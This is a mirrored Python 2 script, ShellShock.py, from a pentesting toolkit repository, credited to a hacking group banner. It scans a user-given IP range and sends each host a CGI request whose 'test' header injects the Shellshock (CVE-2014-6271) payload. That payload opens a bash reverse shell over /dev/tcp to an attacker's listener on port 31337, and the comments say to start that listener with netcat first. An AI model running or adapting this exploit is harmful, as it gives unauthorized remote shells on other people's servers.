mirror of
https://github.com/autistic-symposium/sec-pentesting-toolkit.git
synced 2025-04-27 02:59:08 -04:00
68 lines
3.8 KiB
Python
68 lines
3.8 KiB
Python
We are...
|
|
_____ _________
|
|
/ _ \ ____ ____ ____ / _____/ ____ ____
|
|
/ /_\ \ / \ / _ \ / \ \_____ \_/ __ \_/ ___\
|
|
/ | \ | ( <_> ) | \/ \ ___/\ \___
|
|
\____|__ /___| /\____/|___| /_______ /\___ >\___ >
|
|
\/ \/ \/ \/ \/ \/
|
|
//Laughing at your security since 2012*
|
|
=================================================================================================
|
|
Official Members: Mrlele - AnonSec666 - 3r3b0s - 4prili666h05t - Hannaichi - ap3x h4x0r - d3f4ult
|
|
- Gh05tFr3ak - xCyb3r 3vil7 - Hassouna Khalil - spider64
|
|
=================================================================================================
|
|
|
|
# \!/ Enter your No-Ip address or other listening address in line 57 \!/
|
|
# \!/ Launch nc -l 31337 before executing script! \!/
|
|
# Dont forgets to update bash so you donts get PWNed while "testing"... lol
|
|
# yum -y update bash; apt-get -y update bash; reboot
|
|
# (Script is coded in python2.7, errors running with python3.0)
|
|
|
|
import httplib,urllib
|
|
|
|
print "###########################################################"
|
|
print "### ShellShock.py ###"
|
|
print "### Bash 0-day Environment Variable Injector ###"
|
|
print "### CVE-2014-6271 ###"
|
|
print "### *************************************************** ###"
|
|
print "### ###"
|
|
print "### It's either shell or be shelled ###"
|
|
print "### ###"
|
|
print "### _.-''|''-._ ###"
|
|
print "### .-' | `-. ###"
|
|
print "### .'\ | /`. ###"
|
|
print "### .' \ | / `. ###"
|
|
print "### \ \ | / / ###"
|
|
print "### `\ \ | / /' ###"
|
|
print "### `\ \ | / /' ###"
|
|
print "### `\ \ | / /' ###"
|
|
print "### _.-`\ \ | / /'-._ ###"
|
|
print "### {_____`\\|//'______} ###"
|
|
print "### `-' ###"
|
|
print "### ###"
|
|
print "### twitter.com/_d3f4ult ###"
|
|
print "###########################################################"
|
|
print "\n"
|
|
print '\t\!/ Reverse shell returned on port 31337 \!/\n'
|
|
print '\t Enter The First Three IP ranges To Scan \n'
|
|
url = raw_input(" [Example : 123.456.789] : ")
|
|
finput = input("Enter the Starting IP of Range to Scan : ")
|
|
sinput = input("Enter the Ending IP of Range to Scan for : ")
|
|
print
|
|
|
|
path = raw_input("Enter Vuln CGI Path : ")
|
|
|
|
for x in range(finput,sinput + 1):
|
|
murl = url + "." + str(x)
|
|
conn = httplib.HTTPConnection(murl)
|
|
reverse_shell='() { :; }; /bin/bash -i >& /dev/tcp/NO-IP/31337 0>&1'
|
|
headers = {"Content-type": "application/x-www-form-urlencoded",
|
|
"test": reverse_shell}
|
|
conn.request("GET",path,headers=headers)
|
|
res = conn.getresponse()
|
|
|
|
if str(res.status) == '200':
|
|
print "[+] Website Present and Payload Successfully Sent To " + murl + path
|
|
data = res.read()
|
|
print data
|
|
else:
|
|
print "[!]" + murl + path + " Is Not Vulnerable." |